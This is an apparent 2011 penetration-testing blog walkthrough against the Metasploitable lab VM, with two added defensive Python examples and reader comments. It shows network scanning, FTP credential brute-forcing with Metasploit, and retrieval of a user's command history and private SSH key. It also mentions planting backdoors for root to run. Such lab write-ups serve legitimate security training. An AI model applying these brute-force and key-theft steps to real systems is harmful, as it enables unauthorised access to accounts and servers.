Saturday, August 27, 2011

Metasploitable - Exploring FTP service

root@victor:msf3# ./msfconsole 
     ,           ,
    /             \
   ((_---,,,---_))
      (_)O O(_)_________
         \ _ /            |\
          o_o \   M S F   | \
               \   _____  |  *
                |||   WW|||
                |||     |||


       =[ metasploit v4.0.1-dev [core:4.0 api:1.0]
+ -- --=[ 727 exploits - 372 auxiliary - 78 post
+ -- --=[ 227 payloads - 27 encoders - 8 nops
       =[ svn r13625 updated today (2011.08.24)


msf > 


We start by identifying live hosts with an nmap ping scan.
msf > nmap -sP 172.72.5.2-254
[*] exec: nmap -sP 172.72.5.2-254
 
Starting Nmap 5.21 ( http://nmap.org ) at 2011-08-25 03:04 IST
Nmap scan report for 172.72.5.143
Host is up (0.00042s latency).
MAC Address: 00:0C:29:8D:8D:A4 (VMware)
Nmap scan report for 172.72.5.254
Host is up (0.00019s latency).
MAC Address: 00:50:56:FD:82:EC (VMware)
Nmap done: 253 IP addresses (2 hosts up) scanned in 5.06 seconds
msf >
We find our target Metasploitable system at IP 172.72.5.143. Let's gather information on the services running on the target.

-sV -> probe open ports to identify service / version info
-sT -> TCP connect scan; performs a full 3-way TCP handshake. Slower, but very reliable.
msf > nmap -sV -sT 172.72.5.143
[*] exec: nmap -sV -sT 172.72.5.143
Starting Nmap 5.21 ( http://nmap.org ) at 2011-08-25 03:07 IST
Nmap scan report for 172.72.5.143
Host is up (0.00043s latency).
Not shown: 988 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.1
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp open telnet Linux telnetd
25/tcp open smtp Postfix smtpd
53/tcp open domain ISC BIND 9.4.2
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.10 with Suhosin-Patch)
139/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
3306/tcp open mysql MySQL 5.0.51a-3ubuntu5
5432/tcp open postgresql PostgreSQL DB 8.3.0 - 8.3.7
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
8180/tcp open http Apache Tomcat/Coyote JSP engine 1.1
 
Service Info: Host: metasploitable.localdomain; OSs: Unix, Linux 
Service detection performed. Please report any incorrect results at http://nmap.org/submit/.
Nmap done: 1 IP address (1 host up) scanned in 11.72 seconds
We will explore these services one by one and see what we can find with each.


1. 21/tcp open ftp ProFTPD 1.3.1

Metasploit auxiliary module -> auxiliary/scanner/ftp/ftp_login

set PASS_FILE /opt/metasploit_open/msf3/data/wordlists/unix_passwords.txt
set USER_FILE /opt/metasploit_open/msf3/data/wordlists/unix_users.txt
setg RHOSTS 172.72.5.143
run
[+] 172.72.5.143:21 - Successful FTP login for 'postgres':'postgres'
[*] 172.72.5.143:21 - User 'postgres' has READ/WRITE access
[+] 172.72.5.143:21 - Successful FTP login for 'service':'service'
[*] 172.72.5.143:21 - User 'service' has READ/WRITE access
[+] 172.72.5.143:21 - Successful FTP login for 'user':'user'
[*] 172.72.5.143:21 - User 'user' has READ/WRITE access
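From the defender's side a wordlist run like this one is loud: ProFTPD logs every attempt, so a burst of failures from one client followed by a success is the signature to alert on. The following is an added example (mine, not from the original post or from Metasploit) that flags such clients and lists which accounts they then got into; the log lines are constructed, and the message wording is my assumption about ProFTPD 1.3's syslog format.

```python
"""Detect password guessing against ProFTPD from its syslog lines. Added
example, not from the post; log lines are constructed, wording assumed."""
import re
from collections import defaultdict
from datetime import datetime

LINE = re.compile(
    r"^(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) \S+ proftpd\[\d+\]: \S+ "
    r"\((?P<src>[^\[]+)\[[^\]]*\]\) - USER (?P<user>\S+?)"
    r"(?: \(Login failed\): (?P<why>.+)|: Login successful\.)$")

# Constructed sample: wordlist run from 172.72.5.1 (bursty, many accounts, two hit) plus a typo-then-success from 172.72.5.20.
H = "metasploitable proftpd[4010]: metasploitable.localdomain"
SAMPLE_LOG = "\n".join([
    f"Aug 25 03:09:58 {H} (172.72.5.1[172.72.5.1]) - USER root (Login failed): Incorrect password.",
    f"Aug 25 03:09:59 {H} (172.72.5.1[172.72.5.1]) - USER daemon (Login failed): Incorrect password.",
    f"Aug 25 03:09:59 {H} (172.72.5.1[172.72.5.1]) - USER postgres (Login failed): Incorrect password.",
    f"Aug 25 03:10:00 {H} (172.72.5.1[172.72.5.1]) - USER postgres: Login successful.",
    f"Aug 25 03:10:01 {H} (172.72.5.1[172.72.5.1]) - USER service (Login failed): Incorrect password.",
    f"Aug 25 03:10:02 {H} (172.72.5.1[172.72.5.1]) - USER service: Login successful.",
    f"Aug 25 03:40:00 {H} (172.72.5.20[172.72.5.20]) - USER user (Login failed): Incorrect password.",
    f"Aug 25 03:40:09 {H} (172.72.5.20[172.72.5.20]) - USER user: Login successful.",
])


def detect_guessing(log_text, threshold=4, window_s=60):
    """Return {client: summary} for clients with >= threshold failed logins in
    window_s seconds; summary notes accounts tried and which later succeeded."""
    fails, wins = defaultdict(list), defaultdict(set)
    for line in log_text.splitlines():
        m = LINE.match(line)
        if not m:
            continue
        # syslog omits the year; assume the capture year so time deltas work
        ts = datetime.strptime("2011 " + m["ts"], "%Y %b %d %H:%M:%S")
        if m["why"]:
            fails[m["src"]].append((ts, m["user"]))
        else:
            wins[m["src"]].add(m["user"])
    alerts = {}
    for src, events in sorted(fails.items()):
        events.sort()
        for i in range(len(events) - threshold + 1):
            span = (events[i + threshold - 1][0] - events[i][0]).total_seconds()
            if span <= window_s:  # threshold failures inside one window
                alerts[src] = {"failed": len(events), "succeeded": sorted(wins[src]),
                               "users_tried": len({u for _, u in events})}
                break
    return alerts
```

The "succeeded" list is the part worth acting on: those are the accounts whose passwords are now known to the guessing client and need rotating.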
We now have 3 FTP login credentials. Let's use these IDs to log in to the target.
root@victor:tmp# ftp 172.72.5.143
Connected to 172.72.5.143.
220 ProFTPD 1.3.1 Server (Debian) [::ffff:172.72.5.143]
Name (172.72.5.143:victor): user
331 Password required for user
Password:
230 User user logged in
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -lat
200 PORT command successful
150 Opening ASCII mode data connection for file list
drwxr-xr-x 3 user user 4096 Aug 24 21:59 .
-rw------- 1 user user 165 May 7 2010 .bash_history
drwx------ 2 user user 4096 May 7 2010 .ssh
drwxr-xr-x 6 root root 4096 Apr 16 2010 ..
-rw-r--r-- 1 user user 220 Mar 31 2010 .bash_logout
-rw-r--r-- 1 user user 2928 Mar 31 2010 .bashrc
-rw-r--r-- 1 user user 586 Mar 31 2010 .profile
226 Transfer complete
.bash_history keeps a history of commands a user has run. Many times in pentests I've found useful info on targets in this little file: user IDs, passwords, confidential file names and locations, important server names, shared resources etc.
I will download this file.
Remember that information gathering is a continuous, ongoing phase during a penetration test. You build upon the collected information to leverage access into the target environment.
ftp> get .bash_history
local: .bash_history remote: .bash_history
200 PORT command successful
150 Opening BINARY mode data connection for .bash_history (165 bytes)
226 Transfer complete
165 bytes received in 0.00 secs (41.6 kB/s)
There is also a .ssh directory. Checking it reveals the public and private SSH keys of 'user'.
In a pentest you may come across a scenario where SSH is permitted for device / server administration but passwords are not used; instead, public key authentication is configured. This means that if you can obtain the SSH keys of a [ privileged ] user, you gain direct access to the resources without needing to know the login password. Also, in certain environments, access and security are tied to trusts. Once you can impersonate a 'trusted' / authorized user, gaining access to other juicy resources is a piece of cake.
We go into the .ssh directory and see the key pair is there. The private key is what we need. Download it.
ftp> cd .ssh
250 CWD command successful
ftp> ls -lta
200 PORT command successful
150 Opening ASCII mode data connection for file list
drwxr-xr-x 3 user user 4096 Aug 24 21:59 ..
drwx------ 2 user user 4096 May 7 2010 .
-rw------- 1 user user 668 May 7 2010 id_dsa
-rw-r--r-- 1 user user 609 May 7 2010 id_dsa.pub
226 Transfer complete
ftp> get id_dsa
local: id_dsa remote: id_dsa
200 PORT command successful
150 Opening BINARY mode data connection for id_dsa (668 bytes)
226 Transfer complete
668 bytes received in 0.00 secs (327.8 kB/s)
ftp> get id_dsa.pub
local: id_dsa.pub remote: id_dsa.pub
200 PORT command successful
150 Opening BINARY mode data connection for id_dsa.pub (609 bytes)
226 Transfer complete
609 bytes received in 0.00 secs (379.8 kB/s)
ftp> bye
From the .bash_history file, a new user 'msfadmin' appears to be present on the target box.
root@victor:tmp# cat bash_history-user 
ssh-keygen -t dsa
ls
cd .ssh
ls
sudo -s
cd /home/user
lsls .ss
ls .ssj
clear
ls .ssh
sudo cat ~/.ssh/id_dsa.pub >> /home/msfadmin/.ssh/authorized_keys
sudo -s
exit
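The history above shows why the exposed key matters: 'user' has been appended to msfadmin's authorized_keys, so user's id_dsa opens msfadmin too. The added example below (mine, not from the original post) audits a home-directory tree for exactly that kind of cross-account trust, and goes one step beyond the post by also reporting private keys with group/other permission bits set; the directory tree and key blobs are constructed placeholders, not real keys.

```python
"""Audit SSH key trust under a home-directory tree. Added example, not from
the original post; the fixture and key blobs below are constructed."""
import stat
import tempfile
from pathlib import Path


def key_blob(line):
    """(keytype, base64) of an OpenSSH public-key line, or None for other lines."""
    parts = line.split()
    for i, part in enumerate(parts):  # skip any leading options such as from=
        if part.startswith(("ssh-", "ecdsa-")) and i + 1 < len(parts):
            return part, parts[i + 1]
    return None


def audit_trust(home_root):
    """Return (trusts, loose): (key_owner, account) pairs where an account's
    authorized_keys trusts another user's key, and private keys not mode 0600."""
    root = Path(home_root)
    owners = {}
    for pub in root.glob("*/.ssh/*.pub"):
        blob = key_blob(pub.read_text())
        if blob:
            owners[blob] = pub.relative_to(root).parts[0]
    trusts, loose = set(), []
    for ak in root.glob("*/.ssh/authorized_keys"):
        account = ak.relative_to(root).parts[0]
        for line in ak.read_text().splitlines():
            blob = key_blob(line)
            if blob in owners and owners[blob] != account:
                trusts.add((owners[blob], account))
    for priv in root.glob("*/.ssh/id_*"):
        if priv.suffix != ".pub" and stat.S_IMODE(priv.stat().st_mode) & 0o077:
            loose.append(str(priv.relative_to(root)))
    return sorted(trusts), sorted(loose)


def build_sample_tree():
    """Constructed fixture mirroring the post: user's key in msfadmin's authorized_keys."""
    root = Path(tempfile.mkdtemp())
    pub = "ssh-dss AAAAB3NzaC1kc3MAAACBAPLACEHOLDER user@metasploitable\n"
    (root / "user/.ssh").mkdir(parents=True)
    (root / "user/.ssh/id_dsa.pub").write_text(pub)
    (root / "user/.ssh/id_dsa").write_text("-----BEGIN DSA PRIVATE KEY-----\n")
    (root / "user/.ssh/id_dsa").chmod(0o644)  # deliberately loose for the demo
    (root / "msfadmin/.ssh").mkdir(parents=True)
    (root / "msfadmin/.ssh/authorized_keys").write_text("# admin keys\n" + pub)
    return root
```

Run against a real /home the trust pairs tell you which low-value account is effectively an admin account, which is the relationship the FTP access turned into a full compromise here.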
After brute forcing, it is confirmed that, just like the previous 3 users, msfadmin is a joe account, meaning the password is the same as the user ID -> msfadmin. FTP login using msfadmin is successful.

ftp 172.72.5.143
Connected to 172.72.5.143.
220 ProFTPD 1.3.1 Server (Debian) [::ffff:172.72.5.143]
Name (172.72.5.143:victor): msfadmin
331 Password required for msfadmin
Password:
230 User msfadmin logged in
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -lat
200 PORT command successful
150 Opening ASCII mode data connection for file list
-rw------- 1 msfadmin msfadmin 806 May 18 2010 .bash_history
drwxr-xr-x 5 msfadmin msfadmin 4096 May 18 2010 .
drwx------ 2 msfadmin msfadmin 4096 May 18 2010 .ssh
-rw-r--r-- 1 msfadmin msfadmin 0 May 7 2010 .sudo_as_admin_successful
-rw------- 1 msfadmin msfadmin 98 Apr 28 2010 .lesshst
drwxr-xr-x 6 msfadmin msfadmin 4096 Apr 28 2010 vulnerable
drwxr-xr-x 4 msfadmin msfadmin 4096 Apr 17 2010 .distcc
drwxr-xr-x 6 root root 4096 Apr 16 2010 ..
-rw-r--r-- 1 msfadmin msfadmin 586 Mar 16 2010 .profile
226 Transfer complete
The user has read/write privileges via the FTP service. Even though these are non-root accounts with RW privileges only in their home directories, we have gained a foothold on the target. The same applies to other system / network services such as Samba [ file sharing ] or SSH [ remote access ]. Using these accounts, it is now possible to explore the file system, configuration(s), set-up, and any specific software / applications that are installed and may be vulnerable. Another option is to upload backdoor / malware / trojan / privilege escalation exploit(s) to the server. The expectation is to wait for some user, usually root or a root-privileged user, to access these malicious executables and run them. Once the executable runs, depending on its function, a variety of actions can be performed, including but not limited to gaining a shell, executing commands, sniffing sensitive data off the wire and sending the logs to the attacker, enumerating other systems in the network for further exploitation, and many more.
In a pentest, however, always document any changes you've made to the file system and remember to clean up executables, configuration changes etc. before you sign off for the day. Normally, any changes made by the pentester, and the associated risk, must be discussed with the customer and agreed upon in the Terms of Engagement.
Next up --> Exploring SSH service

11 comments:

  1. Nice work...

    But i am facing some problems in finding the login usernames and passwords with the ftp_login of metasploit.

    1) first i am using backtrack 5. The files containing the usernames and passwords are in
    /opt/framework3/msf3/data/wordlists

    2) Second, the ftp_login is rejecting the credentials user:user, postgres:postgres and service:service

    Do you have any idea why this is happening? do i have to do something else first to execute this module or set another parameter in the module except for rhost, username file and password files?
    thank you
    chris

  2. Hi Chris,

    Are you able to login to FTP manually?

    take care,
    KG

  3. Yes, I am able to login to FTP manually...ncrack is working correctly also and it is able to find the usernames/passwords...can it be a bug in the ftp_login module?

  4. Can you please post 'show options'?

    take care,
    KG

  5. Hope this helps...

    msf auxiliary(ftp_login) > show options

    Module options (auxiliary/scanner/ftp/ftp_login):

    Name              Current Setting                                          Required  Description
    ----              ---------------                                          --------  -----------
    BLANK_PASSWORDS   true                                                     no        Try blank passwords for all users
    BRUTEFORCE_SPEED  5                                                        yes       How fast to bruteforce, from 0 to 5
    PASSWORD                                                                   no        A specific password to authenticate with
    PASS_FILE         /opt/framework3/msf3/data/wordlists/unix_passwords.txt  no        File containing passwords, one per line
    RHOSTS            192.168.153.132                                          yes       The target address range or CIDR identifier
    RPORT             21                                                       yes       The target port
    STOP_ON_SUCCESS   false                                                    yes       Stop guessing when a credential works for a host
    THREADS           1                                                        yes       The number of concurrent threads
    USERNAME                                                                   no        A specific username to authenticate as
    USERPASS_FILE                                                              no        File containing users and passwords separated by space, one pair per line
    USER_AS_PASS      true                                                     no        Try the username as the password for all users
    USER_FILE         /opt/framework3/msf3/data/wordlists/unix_users.txt      no        File containing usernames, one per line
    VERBOSE           true                                                     yes       Whether to print output for all attempts

  6. This looks fine. Can you start fresh & try the following:

    1. Manually set a single user name and password:
    set password postgres
    set username postgres
    run

    2. Create a new username file with only 1 user, say postgres. Similarly, create a new password file with 1 password, postgres. Then run the module.

    Post the module run output in these cases, in case it still doesn't confirm the user.

    take care,
    KG

  7. 1) worked.

    2) didn't work!!!

    wtf? is it a bug?

    1. Anonymous, I am also using Back Track 5 updated till date. Since the default password file was taking long to brute force I tried making a new file with 3 usernames and passwords and it worked. You can give it a try as well.
      Cheers

  8. Glad it worked. You could check with backtrack forums or @ irc. Folks over there can look into this issue & confirm whether this is specific to bt5.

    thanks,
    KG


Disclaimer

The views, information & opinions expressed in this blog are my own and do not reflect the views of my current or former employers or employees or colleagues.